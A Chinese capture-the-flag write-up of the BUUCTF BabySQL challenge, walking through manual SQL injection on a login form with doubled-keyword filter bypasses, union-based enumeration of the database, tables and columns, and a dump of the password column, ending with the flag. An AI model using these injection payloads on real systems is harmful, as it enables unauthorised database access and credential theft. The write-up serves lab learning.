2025.1.16——六、BabySQL 双写绕过|联合注入

题目来源:buuctf [极客大挑战 2019]BabySQL 1

目录

一、打开靶机,分析已知信息

二、手工注入解题

[step 1:万能密码](#step 1:万能密码)

[step 2:正常注入,判断字段数](#step 2:正常注入,判断字段数)

[step 3:绕过](#step 3:绕过)

[step 4:查数据库](#step 4:查数据库)

[step 5:查表名](#step 5:查表名)

[step 6:查列名](#step 6:查列名)

[step 7:查数据](#step 7:查数据)

三、小结

1.绕过方式

2.查数据库名和表名可以合二为一


一、打开靶机,分析已知信息

仍为SQL注入系列,提示:有关键字过滤

二、手工注入解题

step 1:万能密码

sql 复制代码
username=admin&password=admin' or '1'='1
sql 复制代码
username=admin'&password=admin or '1'='1

发现万能密码失效了,两种密码结果不同是因为的单引号位置不同,导致闭合情况不同

step 2:正常注入,判断字段数

sql 复制代码
username=1' order by 3%23&password=1

发现or和by都被过滤了

再用

username=admin&password=1' union select 1,where

发现union select where 都被过滤了

过滤:有可能用函数将这些关键字替换成了空白字符

所以要进行绕过

step 3:绕过

尝试过后发现大小写绕过失效,所以尝试双写绕过,没问题,则利用双写关键字进行注入

但这里order by还是无法使用,所以用联合查询直接进行尝试

1.尝试两个字段

sql 复制代码
username=admin&password=1' uunionnion sselectelect 1,2%23

出现错误,有可能列数错误,继续尝试

2.尝试三个字段

sql 复制代码
username=admin&password=1' uunionnion sselectelect 1,2,3%23

回显正常了,且回显点为2,3位置

step 4:查数据库

sql 复制代码
username=admin&password=1' uunionnion sselectelect 1,2,database()%23

数据库名为geek

step 5:查表名

sql 复制代码
username=admin&password=1' uunionnion sselectelect 1,2,group_concat(table_name) ffromrom infoorrmation_schema.tables wwherehere table_schema='geek'%23

得到表名b4bsql

step 6:查列名

sql 复制代码
username=admin&password=1' uunionnion sselectelect 1,2,group_concat(column_name) ffromrom infoorrmation_schema.columns wwherehere table_name='b4bsql'%23

其中password很可疑

step 7:查数据

sql 复制代码
username=admin&password=1' uunionnion sselectelect 1,2,group_concat(passwoorrd) ffromrom geek.b4bsql%23

从源码中得具体信息:flag{14a8c091-b278-4155-a56e-c663801feb59}

三、小结

1.绕过方式

如大小写绕过,双写绕过(双关键字绕过,如Uunionnion,第一个字母后跟原关键字)

SQL注入一些过滤及绕过总结_sql注入过滤-CSDN博客

2.查数据库名和表名可以合二为一

如:username=admin&password=1' uunionnion sselectelect 1,2,group_concat(table_name) ffromrom infoorrmation_schema.tables wwherehere table_schema=database()%23

相关推荐
jack_xu18 分钟前
高频面试题:如何保证数据库和es数据一致性
后端·mysql·elasticsearch
施嘉伟1 小时前
Oracle 11g RAC ASM磁盘组剔盘、加盘实施过程
数据库·oracle
网络安全工程师老王2 小时前
Java Agent 注入 WebSocket 篇
websocket·网络安全·信息安全·渗透测试
橘猫云计算机设计2 小时前
springboot基于hadoop的酷狗音乐爬虫大数据分析可视化系统(源码+lw+部署文档+讲解),源码可白嫖!
数据库·hadoop·spring boot·爬虫·python·数据分析·毕业设计
AI拉呱_2 小时前
医院行业等保2.0案例
安全·web安全
卓怡学长3 小时前
w304基于HTML5的民谣网站的设计与实现
java·前端·数据库·spring boot·spring·html5
电子云与长程纠缠3 小时前
Unreal Niagara制作SubUV贴图翻页动画
学习·ue5·编辑器·贴图·niagara
冰^3 小时前
MySQL VS SQL Server:优缺点全解析
数据库·数据仓库·redis·sql·mysql·json·数据库开发
电商数据girl3 小时前
产品经理对于电商接口的梳理||电商接口文档梳理与接入
大数据·数据库·python·自动化·产品经理
2301_810154553 小时前
纯真社区IP库离线版发布更新
web安全